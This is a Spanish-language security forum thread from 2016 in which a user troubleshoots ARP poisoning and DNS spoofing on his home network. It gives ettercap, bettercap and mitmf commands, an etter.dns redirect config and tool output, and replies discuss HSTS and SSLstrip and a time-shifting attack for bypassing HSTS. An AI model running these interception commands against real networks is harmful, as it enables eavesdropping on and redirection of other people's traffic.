[SOLUCIONADO] Ettercap no hace dns_spoof en otras ip's no redirige

$francisco · Septiembre 22, 2016, 10:34:49 AM

Que tal a todos, os comento la situación.

mi ip: 192.168.0.168
ip victima: 192.168.0.161
puerta enlace: 192.168.0.1

pc1 - 192.168.0.161(pc fisico con antena tplink)
pc2 - 192.168.0.168 (vmware con kali y antena alfa compatible modo monitor)

modifico el archivo etter.dns /etc/ettercap/etter.dns

Código: php

*.underc0de.org   A   192.168.0.168
*.underc0de.*   A   192.168.0.168
www.underc0de.*   A   192.168.0.168
*underc0de.*   A   192.168.0.168

comando ettercap

Código: php

ettercap -T -q -P dns_spoof -i wlan0 -M arp /// ///

respuesta ettercap al acceder a la underc0de desde el pc kali, en el realizo el dns_spoof

Código: php

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Listening on:
 wlan0 -> 00:C0:...........................
	  192.168.0.168/255.255.255.0
	  ........................................

Privileges dropped to EUID 0 EGID 0...

  33 plugins
  42 protocol dissectors
  57 ports monitored
20388 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

4 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : ANY (all the hosts in the list)

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

dns_spoof: A [underc0de.org] spoofed to [192.168.0.168]
dns_spoof: A [underc0de.org] spoofed to [192.168.0.168]
dns_spoof: A [underc0de.org] spoofed to [192.168.0.168]
dns_spoof: A [underc0de.org] spoofed to [192.168.0.168]
dns_spoof: A [underc0de.org] spoofed to [192.168.0.168]

Y desde el pc victima ni si quiera muestra una respuesta en ettercap, utilizo el navegador del pc victima para ver si puedo acceder al servidor de kali y efectivamente puedo ver la pagina introduciendo la url, no se porque no cambia los dns de las victimas y desde el pc de kali simplemente muestra un error al acceder a la pagina como si no existiera ¿alguna idea?

puntoCL · Septiembre 22, 2016, 05:14:55 PM

Primero: levanta el servicio apache que seria service apache2 start

Segundo: seria el https busca una pagina que no tenga https. ocupa este No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

$francisco · Septiembre 22, 2016, 07:32:36 PM

El servicio apache ya estaba levantado, fijate que puse que accedi al servidor desde el navegador, pero solucione a muy poco el problema con

Código: bash

echo 1 > /proc/sys/net/ipv4/ip_forward

Pero no hay manera que funcione en los demas conectados, al hacer esto ya pueden redirigir a mi ip pero solo con kali que es desde donde realizo el ataque pero como bien dices solo con http, aun asi los dns de las victimas no cambian por ejemplo en windows 10 que es la pc 1 accede a las paginas originales y tambien probe desde el movil donde ni siquiera puede acceder a ninguna pagina cuando se realiza el ataque, es como si no resolviera ninguna url, en kali hago ping y efectivamente la ip es la mia local pero en windows 10 es la original la tabla arp tampoco cambia, lo que no entiendo es porque afecta a la maquina virtual y no a los demas si se encuentran en la misma red local, lo unico que estoy pensando es que los navegadores tienen proteccion sobre este tipo de ataques

$francisco · Octubre 02, 2016, 05:13:35 AM

Una duda que me cuestieno es ¿puede ser que ettercap no funcione? ¿ni dnsspoofin? ¿ni un ataque main in the middle? es que esta pregunta me tiene intrigado por que hace años lo probé y funcionaba y ahora estoy haciendo lo mismo y no funciona, ¿es que los router tienen seguridad ya para esto? ¿ y los navegadores?

puntoCL · Octubre 02, 2016, 12:44:05 PM

@$francisco https

D4RKS0N1K · Octubre 02, 2016, 02:45:01 PM

Yo he tenido problemas similares, se ve que el https jode bastante, pero seguro que hay alguna forma de saltárselo

puntoCL · Octubre 02, 2016, 03:53:28 PM

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta SSL, ettercap es super antiguo existe miles herramienta mucho mejores que hace lo mismo es cuestion de buscar otras herramientas

$francisco · Octubre 03, 2016, 10:49:42 AM

¿por ejemplo? es que yo estoy probando con las que trae kali que supuestamente son las mejores para pentesting o al menos eso creo.

puntoCL · Octubre 03, 2016, 11:26:03 AM

bettercap, mitmf, Xerosploit es de googlear kali trae las herramientas mas populares y preciso pero también existen desarrolladores por ejemplo kali no te trae fluxion y esa es una buena herramienta

$francisco · Octubre 05, 2016, 04:45:55 PM

he probado bettercap.

Código: bash

sudo bettercap -X -G 192.168.0.1 --proxy -I wlan0 -S ARP

Y no captura nada y también con mitmf.

Código: bash

mitmf --spoof --dns --arp --gateway 192.168.0.1 -i wlan0

Y sigo con lo mismo, sin capturar nada y en todas las webs que mira lo explican de esta manera, tambien he probado indicanto una dirección ip como target pero tampoco captura ningún trafico, ¿que puede estar pasando? Es algo realmente extraño ya que en todos los ejemplos se ve de esta manera sencilla pero ninguna funciona y ya no se de que manera para poder capturar trafico y utilizar sslstrip2 ya que bettercap y mitmf lo llevan incorporado.

roadd · Octubre 05, 2016, 09:23:36 PM

Buenas! Me parece que es un tema con el HSTS. Probaste con SSLStrip2? Que pasa desde Explorer?

dynyly · Octubre 05, 2016, 09:45:49 PM

salu2
no es por desanimar pero yo en mi humilde opnion nada funciona sobre https si el sitio o la direccion del tiene bien montado el tema
ni ssltrip me aviaba el busador ni etercap haciendo dnsspoof o sea nada todos me dan fallo sobre https
se lo han currao bien la unica manera es con cert validado crear host dominio ...... y google lo detecta a los pocos dias que digo no tarda mas de 24 horas en ser detectado por la base de google

roadd · Octubre 05, 2016, 11:55:58 PM

Los navegadores tienen buenas protecciones últimamente, pero no es un desanime a intentar. Por favor, que de algú. lado salen las ideas.
y tampoco es tan desalentador. Si ya nos encontramos en la red Evilgrade y nos vimos.

$francisco · Octubre 06, 2016, 10:02:34 AM

pero ¿supuestamente mitmf ya viene instalado? lo digo porque en la linea de comandos me dice que se ejecuta pero sigue sin capturar, lo probé con chrome y firefox pero lo que he detectado sobre todo es que no funciona el dns spoofin de ninguna de las maneras no se si alguien sabe el motivo de porque todas estas herramientas no funcionan si supuestamente son "nuevas" adaptadas para los nuevos protocolos y sistemas de protección con cache y demas...

roadd · Octubre 06, 2016, 12:16:50 PM

No la he usado aún. Creo que MITMf sólo sería útil con SSLstrip2. Que yo sepa, no se conoce otra manera de saltear eficaz y remotamente la protección de SSL. Si lo piensan bien, tiene mucho sentido. ¿Cómo vamos a estar al descubierto con una vulnerabilidad de explotación remota con un par de clics como si fuera Windows XP?

Bueno, el HSTS se encarga de eso. Digamos que el navegador tiene una herramienta de fábrica donde vienen precargadas algunas preferencias para muchas de las webs. Por ejemplo: Queres conectarte a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta? Bueno, entonces te obligo a que te conectes a "este host" y mediante "este protocolo" (HTTPS). En caso de no poder, no lograrás hacerlo funcionar porque HSTS es una protección de nivel del cliente.

Por otro lado. Yo te diría que cuando ves una caja fuerte, lo primero que tenés que comprobar es si tiene los tornillos a la vista. Esta manera de probar a la fuerza si podes hacer un downgrade de cifrado no tiene mucho sentido por la complicidad. Creo que es mejor intentar por otro lado.

Como tip: con un script que llama al ataque DeLorean, puede saltear el HSTS de una máquina cambiándole el tiempo de una máquina remotamente. Eso si, sólo serviría si mantiene peticiones NTP, así que estaríamos hablando de S.O.s en particular o de ciertas configuraciones hechas por alguien.

(He aquí el link a referencia: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta )

Quizás puedas encontrar la forma de cambiar la fecha del equipo remotamente hacia muchos años al futuro para que los certificados queden inválidos, aunque también levantaría alarmas del sistema.

Saludos, Roadd.

$francisco · Octubre 06, 2016, 05:28:07 PM

La verdad que no se como hacer ver si le llega el response, pero he probado ha hacer el ARP por el router, tambien a solo una maquia y tambien a envenenar a toda la red, activando el dns solo consigo que funcione en la maquina de kali que es desde la que ejecuto los comandos, ni si quiera haciendo "ipconfig/flushdns" funciona los dns cambiados, probe con páginas con https y http y tampoco entonces decidí hacer algo mas sencillo

Código: bash

root@kali:~# sudo bettercap -T 192.168.0.163 --proxy -I wlan0
 _          _   _
| |__   ___| |_| |_ ___ _ __ ___ __ _ _ __
| '_ \ / _ \ __| __/ _ \ '__/ __/ _` | '_ \
| |_) |  __/ |_| ||  __/ | | (_| (_| | |_) |
|_.__/ \___|\__|\__\___|_|  \___\__,_| .__/
                                     |_| v1.5.8
http://bettercap.org/



[I] Starting [ spoofing:✔ discovery:✘ sniffer:✘ tcp-proxy:✘ http-proxy:✔ https-proxy:✘ sslstrip:✔ http-server:✘ dns-server:true ] ...

[I] [wlan0] 192.168.0.168 : x / wlan0 ( ALFA )
[I] [GATEWAY] 192.168.0.1 : x ( Huawei Technologies )
[I] [DNS] Starting on 192.168.0.168:5300 ...
[I] [TARGET] 192.168.0.163 : x ( BQ )
[I] [HTTP] Proxy starting on 192.168.0.168:8080 ...

Como podeis ver intento capturar el trafico de mi telefono movil, navego un poco con mi movil en paginas http y https y no muestra nada de ninguna de las maneras ni con bettercap ni con mitmf y ya se me acaban las ideas.

roadd · Octubre 06, 2016, 07:24:03 PM

Que onda con Wireshark? Estas usando una red inalambrica? Estas haciendo mucho embrollo. Los ataques ARP son para una red cableada!

$francisco · Octubre 06, 2016, 08:39:28 PM

Utilice wireshark con el filtro

Código: php

ip.addr==192.168.0.1

Y me dice en algunos paquetes que se detecta una ip duplicada y me indica que es la del router, la verdad no sabia que solo fuera por cable, yo pensaba que por wifi tambien se podia hacer por cierto ¿cual es el motivo que no se pueda hacer por wifi?

roadd · Octubre 06, 2016, 10:13:50 PM

Para eso deberías leer desde qué es la tabla ARP y cual es el protocolo que utiliza. Desde ahí cual es el sistema de comunicación inalámbrica. Entenderías por qué. Es muy fácil pero no me parece que tenga que contestar a esta pregunta en este post, ya que se desviaría y se haría muy extenso. Te recomiendo que leas un poco sobre eso y muchas dudas se te resolverán

$francisco · Octubre 07, 2016, 09:57:02 AM

Pues muchas gracias por todas las respuestas, me quedo claro ahora a seguir leyendo.

[SOLUCIONADO] Ettercap no hace dns_spoof en otras ip's no redirige

Septiembre 22, 2016, 10:34:49 AM Ultima modificación: Octubre 07, 2016, 12:41:43 PM por Gabriela

Septiembre 22, 2016, 05:14:55 PM #1

Septiembre 22, 2016, 07:32:36 PM #2

Octubre 02, 2016, 05:13:35 AM #3

Octubre 02, 2016, 12:44:05 PM #4

Octubre 02, 2016, 02:45:01 PM #5

Octubre 02, 2016, 03:53:28 PM #6 Ultima modificación: Octubre 02, 2016, 03:57:27 PM por puntoCL

Octubre 03, 2016, 10:49:42 AM #7

Octubre 03, 2016, 11:26:03 AM #8

Octubre 05, 2016, 04:45:55 PM #9

Octubre 05, 2016, 09:23:36 PM #10

Octubre 05, 2016, 09:45:49 PM #11

Octubre 05, 2016, 11:55:58 PM #12

Octubre 06, 2016, 10:02:34 AM #13

Octubre 06, 2016, 12:16:50 PM #14

Octubre 06, 2016, 05:28:07 PM #15

Octubre 06, 2016, 07:24:03 PM #16

Octubre 06, 2016, 08:39:28 PM #17

Octubre 06, 2016, 10:13:50 PM #18

Octubre 07, 2016, 09:57:02 AM #19